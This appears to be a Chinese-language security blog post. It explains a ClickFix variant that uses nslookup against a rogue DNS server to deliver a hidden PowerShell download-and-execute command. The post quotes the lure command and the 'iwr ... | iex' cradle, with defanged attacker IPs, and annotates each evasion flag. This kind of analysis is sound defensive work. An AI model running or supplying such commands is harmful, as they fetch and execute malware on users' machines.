現在 clickFix 會搭配 nslookup DNS

Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup

讓你執行的 ↓

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Nmexxxxxxxxxxxxxxx | cmd

但它實際是透過 84.21.189[.]20 這裡查 example.com 的 假 DNS 記錄 (不是真正的 example.com 記錄)

一樣是讓你執行 powershell ,然後下載惡意程式執行它

clickFix nslookup dns

解釋 cname 內容

powershell.exe
呼叫 PowerShell 主程式。

\032
\032 是八進位的 ASCII 32(也就是「空白字元」)。攻擊者常用它來做 obfuscation(混淆)。

-ep bypass(ExecutionPolicy Bypass)
暫時繞過執行原則限制,讓腳本更容易跑(常見於惡意行為)。

-w h(-WindowStyle Hidden)
視窗隱藏執行,讓使用者不容易察覺。

-c "..."(Command)
直接執行後面引號內的指令字串。

iwr http://64.227.40[.]197/o -useb
iwr 是 Invoke-WebRequest 的別名:去指定 URL 下載內容。
-useb 是 -UseBasicParsing(較舊版本用來避免依賴 IE 解析元件;也常被用在惡意下載器)。

| iex
管線把下載回來的文字內容交給 iex(Invoke-Expression)直接當作程式碼執行。
這是典型 「下載並執行(download cradle)」 的惡意樣式。
Related posts 相關文章
DNSSEC sign 簽錯了,導致 DNS 查詢失敗
More...
如何驗證 Linux 的 DNS 查詢有輪替
More...
dnscrypt-proxy 讓 DNS 查詢加密
More...
DNS BIND 9.16.50 最後一個版本已釋出
More...

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。